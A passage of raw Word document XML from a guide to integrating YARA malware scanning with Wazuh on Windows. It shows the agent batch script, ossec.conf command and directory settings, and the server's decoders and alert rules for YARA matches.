              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>set yara_exe_path="C:\Program Files (x86)\ossec-agent\active-response\bin\yara\yara64.exe"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A3D9CC4" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>set yara_rules_path="C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\yara_rules.yar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B3F7C6" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>echo %syscheck_file_path% &gt;&gt; %log_file_path%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B354856" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>for /f "delims=" %%a in ('powershell -command "&amp; \"%yara_exe_path%\" \"%yara_rules_path%\" \"%syscheck_file_path%\""') do (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7624EA2C" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t xml:space="preserve">    echo wazuh-yara: INFO - Scan result: %%a &gt;&gt; %log_file_path%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01389F96" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="744EEBDF" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3269D1F8" w14:textId="12BBB490" w:rsidR="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>exit /b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CEF262B" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245F1CE2" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00824958">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192EF2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Add the directory to monitor in ossec conf : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604BD5BC" w14:textId="60005329" w:rsidR="005748D2" w:rsidRDefault="00F25940" w:rsidP="005748D2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F25940">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;directories check_all="yes" realtime="yes"&gt;C:\projects&lt;/directories&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF4DBD4" w14:textId="77777777" w:rsidR="00F25940" w:rsidRPr="005748D2" w:rsidRDefault="00F25940" w:rsidP="005748D2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0C0FFD" w14:textId="173E7650" w:rsidR="005748D2" w:rsidRPr="005748D2" w:rsidRDefault="005748D2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005748D2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The agent must know how to execute the custom command defined on the manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4588C391" w14:textId="4FFA8CF6" w:rsidR="005748D2" w:rsidRPr="005748D2" w:rsidRDefault="005748D2" w:rsidP="005748D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="005748D2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>File: C:\Program Files (x86)\ossec-agent\ossec.conf</w:t>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10461"/>
      </w:tblGrid>
      <w:tr w:rsidR="005748D2" w14:paraId="0659EB37" w14:textId="77777777" w:rsidTr="005748D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10461" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="11DA4B74" w14:textId="77777777" w:rsidR="005748D2" w:rsidRPr="005748D2" w:rsidRDefault="005748D2" w:rsidP="005748D2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="005748D2">
              <w:t>&lt;ossec_config&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E8D68C5" w14:textId="77777777" w:rsidR="005748D2" w:rsidRPr="005748D2" w:rsidRDefault="005748D2" w:rsidP="005748D2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="005748D2">
              <w:t xml:space="preserve">  &lt;command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F94049" w14:textId="77777777" w:rsidR="005748D2" w:rsidRPr="005748D2" w:rsidRDefault="005748D2" w:rsidP="005748D2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="005748D2">
              <w:t xml:space="preserve">    &lt;name&gt;yara_windows&lt;/name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2223E798" w14:textId="77777777" w:rsidR="005748D2" w:rsidRPr="005748D2" w:rsidRDefault="005748D2" w:rsidP="005748D2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="005748D2">
              <w:t xml:space="preserve">    &lt;executable&gt;yara.bat&lt;/executable&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5678791A" w14:textId="77777777" w:rsidR="005748D2" w:rsidRPr="005748D2" w:rsidRDefault="005748D2" w:rsidP="005748D2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="005748D2">
              <w:t xml:space="preserve">    &lt;timeout_allowed&gt;no&lt;/timeout_allowed&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66CAADD7" w14:textId="77777777" w:rsidR="005748D2" w:rsidRPr="005748D2" w:rsidRDefault="005748D2" w:rsidP="005748D2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="005748D2">
              <w:t xml:space="preserve">  &lt;/command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="087BF151" w14:textId="77777777" w:rsidR="005748D2" w:rsidRPr="005748D2" w:rsidRDefault="005748D2" w:rsidP="005748D2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="005748D2">
              <w:t>&lt;/ossec_config&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75E8FDB4" w14:textId="77777777" w:rsidR="005748D2" w:rsidRDefault="005748D2" w:rsidP="005748D2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="292E86A4" w14:textId="77777777" w:rsidR="005748D2" w:rsidRDefault="005748D2" w:rsidP="00192EF2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="510DDD17" w14:textId="072C3FB2" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00192EF2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192EF2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Restart the Wazuh agent to apply the configuration chang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92EF2" w14:paraId="43B60CD8" w14:textId="77777777" w:rsidTr="00192EF2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1EF1F7A4" w14:textId="20785DF7" w:rsidR="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="00192EF2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00192EF2">
              <w:t>Restart-Service -Name wazuh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C9EA9C4" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="00192EF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16742D1F" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="00192EF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192EF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wazuh server configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A51D2E" w14:textId="77777777" w:rsidR="00E64255" w:rsidRDefault="00E64255" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6510FC48" w14:textId="4EAAE6AD" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00192EF2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192EF2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Add the following decoders to the Wazuh server /var/ossec/etc/decoders/local_decoder.xml file. </w:t>
      </w:r>
      <w:r w:rsidRPr="00192EF2">
        <w:t>This allows extracting the information from YARA scan results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DCB16D" w14:textId="77777777" w:rsidR="00E64255" w:rsidRDefault="00E64255" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>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92EF2" w14:paraId="4A83C6EF" w14:textId="77777777" w:rsidTr="00192EF2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="11A18821" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="00192EF2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00192EF2">
              <w:t>&lt;decoder name="yara_decoder"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CF00BD0" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="00192EF2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00192EF2">
              <w:t xml:space="preserve">    &lt;prematch&gt;wazuh-yara:&lt;/prematch&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="200222C0" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="00192EF2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00192EF2">
              <w:t>&lt;/decoder&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CFBE0B7" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="00192EF2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35E89277" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="00192EF2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00192EF2">
              <w:t>&lt;decoder name="yara_decoder1"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3647ABBC" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="00192EF2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00192EF2">
              <w:t xml:space="preserve">    &lt;parent&gt;yara_decoder&lt;/parent&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7694103A" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="00192EF2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00192EF2">
              <w:t xml:space="preserve">    &lt;regex&gt;wazuh-yara: (\S+) - Scan result: (\S+) (\S+)&lt;/regex&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="293F8578" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRPr="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="00192EF2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00192EF2">
              <w:t xml:space="preserve">    &lt;order&gt;log_type, yara_rule, yara_scanned_file&lt;/order&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="646324B3" w14:textId="04F024F0" w:rsidR="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="00192EF2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00192EF2">
              <w:lastRenderedPageBreak/>
              <w:t>&lt;/decoder&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D197ABC" w14:textId="77777777" w:rsidR="00E64255" w:rsidRPr="002B20EF" w:rsidRDefault="00E64255" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB1BCB4" w14:textId="0EF0BCAC" w:rsidR="00E879E9" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B20EF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Create new rules in /var/ossec/etc/rules/local_rules.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5F254F" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>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2B20EF" w14:paraId="189ED2B5" w14:textId="77777777" w:rsidTr="002B20EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0AC58549" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;!-- YARA rules --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5696FD63" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;!-- Windows FIM monitoring --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79839DD2" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;group name="syscheck,yara"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="494A7FD8" w14:textId="7E9E47FD" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> &lt;rule id="110300" level="10"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A17535D" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;if_sid&gt;550&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BE60514" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;field name="file"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="425DB87E" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      &lt;match&gt;^C:\\projects\\.*&lt;/match&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="207B86BA" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DEC55F4" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;description&gt;File modified in C:\projects directory (Windows).&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EAA36F3" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="530AE2CA" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63AB4968" w14:textId="1A78019D" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  &lt;rule id="110301" level="10</w:t>
            </w:r>
            <w:r w:rsidR="00D107A3">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D2BF572" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;if_sid&gt;554&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A73E802" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;field name="file"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B988D83" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      &lt;match&gt;^C:\\projects\\.*&lt;/match&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1679ACF0" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54EC3E90" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;description&gt;File added to C:\projects directory (Windows).&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0629102E" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="705E5D78" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F34BD9A" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="555AA445" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;group name="yara,"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="115CD77E" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  &lt;rule id="108000" level="0"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31C3A9E2" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;decoded_as&gt;yara_decoder&lt;/decoded_as&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A5903EA" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;description&gt;Yara grouping rule&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F8066C" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D1B0B9D" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71997095" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  &lt;rule id="108001" level="12"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2680E936" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;if_sid&gt;108000&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A7F7171" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;match&gt;wazuh-yara: INFO - Scan result: &lt;/match&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462FD810" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;description&gt;File "$(yara_scanned_file)" is a positive match. Yara rule: $(yara_rule)&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3480B9C0" w14:textId="77777777" w:rsidR="0081416E" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61807895" w14:textId="4962CFB8" w:rsidR="002B20EF" w:rsidRDefault="0081416E" w:rsidP="0081416E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E8EE0F4" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E64E4A8" w14:textId="7C72E2B9" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B20EF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Add the following configuration to the Wazuh server /var/ossec/etc/ossec.conf file</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2B20EF" w14:paraId="5B63E4B1" w14:textId="77777777" w:rsidTr="002B20EF">
